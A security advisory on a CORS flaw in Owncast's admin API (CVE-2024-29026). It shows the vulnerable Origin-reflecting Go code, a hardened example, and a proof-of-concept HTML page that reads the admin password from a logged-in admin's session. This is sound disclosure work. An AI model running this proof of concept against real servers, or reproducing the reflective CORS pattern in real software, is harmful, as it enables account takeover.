Coordinated Disclosure Timeline
- 2023-12-08: Sent Advisory
- 2023-12-18: Issue patched to only allow localhost CORS access.
Summary
A lenient CORS policy allows attackers to make an authenticated cross-origin request from a third-party website and read privileged information. This can be used to leak the admin password.
Project
Owncast
Tested Version
Details
CORS Misconfiguration in auth.go (GHSL-2023-261)
The CORS handler for admin functions reflects the Origin header unconditionally, allowing an attacker website to make an authenticated cross-origin request and read the response.
// Vulnerable: the Origin header is reflected without validation, so any site passes the CORS check.
w.Header().Set("Access-Control-Allow-Origin", r.Header.Get("Origin"))
// With credentials allowed, the browser attaches the admin's credentials to the cross-origin request.
w.Header().Set("Access-Control-Allow-Credentials", "true")
w.Header().Set("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, Authorization")
This vulnerability was found with the help of the CodeQL CORS Query.
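The following Go program is an added example written for this advisory, not code from the Owncast project; it shows the hardened form of the handler above, with the fix modelled on the "localhost only" change noted in the timeline. The exact allow list (localhost, 127.0.0.1, ::1 over http/https), the withAdminCORS and isLocalhostOrigin names, and the constructed response body are assumptions for illustration. The Origin value is parsed as a URL rather than matched as a substring, so hosts such as localhost.attacker.example are rejected, and Vary: Origin is set so caches do not serve one origin's response to another.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// isLocalhostOrigin reports whether an Origin header value names a localhost
// origin (scheme + host [+ port]) and nothing else. Parsing as a URL, rather
// than matching substrings, means "http://localhost.attacker.example" or
// "http://evil.example/?localhost" do not pass. (Allow list is an assumption.)
func isLocalhostOrigin(origin string) bool {
	if origin == "" {
		return false
	}
	u, err := url.Parse(origin)
	if err != nil || u.Scheme == "" || u.Host == "" {
		return false
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return false
	}
	// A well-formed Origin carries no path, query, fragment or userinfo;
	// anything else is rejected rather than guessed at.
	if u.Path != "" || u.RawQuery != "" || u.Fragment != "" || u.User != nil {
		return false
	}
	switch strings.ToLower(u.Hostname()) {
	case "localhost", "127.0.0.1", "::1":
		return true
	}
	return false
}

// withAdminCORS wraps an admin handler. The vulnerable pattern in the advisory
// reflected r.Header.Get("Origin") unconditionally; here the Origin is echoed
// back only when it passes the localhost allow list.
func withAdminCORS(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		origin := r.Header.Get("Origin")
		if isLocalhostOrigin(origin) {
			w.Header().Set("Access-Control-Allow-Origin", origin)
			w.Header().Set("Access-Control-Allow-Credentials", "true")
			w.Header().Set("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, Authorization")
			// The response depends on the request's Origin; tell caches so.
			w.Header().Set("Vary", "Origin")
		}
		if r.Method == http.MethodOptions {
			// Preflight: no body; a disallowed origin simply gets no CORS headers.
			w.WriteHeader(http.StatusNoContent)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// acaoFor sends a GET with the given Origin through the hardened wrapper and
// returns the Access-Control-Allow-Origin value the response carried
// ("" when cross-origin access was refused). The inner handler's JSON body is
// a constructed placeholder, not real Owncast output.
func acaoFor(origin string) string {
	h := withAdminCORS(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, `{"adminPassword":"<constructed placeholder>"}`)
	}))
	req := httptest.NewRequest(http.MethodGet, "http://owncast.domain/api/admin/serverconfig", nil)
	if origin != "" {
		req.Header.Set("Origin", origin)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Header().Get("Access-Control-Allow-Origin")
}

func main() {
	for _, o := range []string{
		"http://localhost:8080",
		"https://attacker.example",
		"http://localhost.attacker.example",
		"null",
		"",
	} {
		fmt.Printf("Origin %q -> Access-Control-Allow-Origin %q\n", o, acaoFor(o))
	}
}
```

Running the program shows the localhost origin echoed back and every other origin, including the "null" origin a sandboxed frame sends, receiving no Access-Control-Allow-Origin header, so the browser refuses to expose the response to the calling page.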
Impact
This issue may lead to account takeover.
Resources
An attacker can host the following HTML file on their website. When it is accessed by a logged-in admin of Owncast, the page reads the admin server configuration, which includes the admin password, and displays it in an alert.
<html>
<body>
<script>
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      // The response is readable because the server reflected this page's Origin.
      alert(xhr.responseText);
    }
  }
  xhr.open('GET', 'http://owncast.domain/api/admin/serverconfig', true);
  // Send the admin's credentials with the cross-origin request.
  xhr.withCredentials = true;
  xhr.send(null);
</script>
</body>
</html>
CVE
- CVE-2024-29026
Credit
This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-261 in any communication regarding this issue.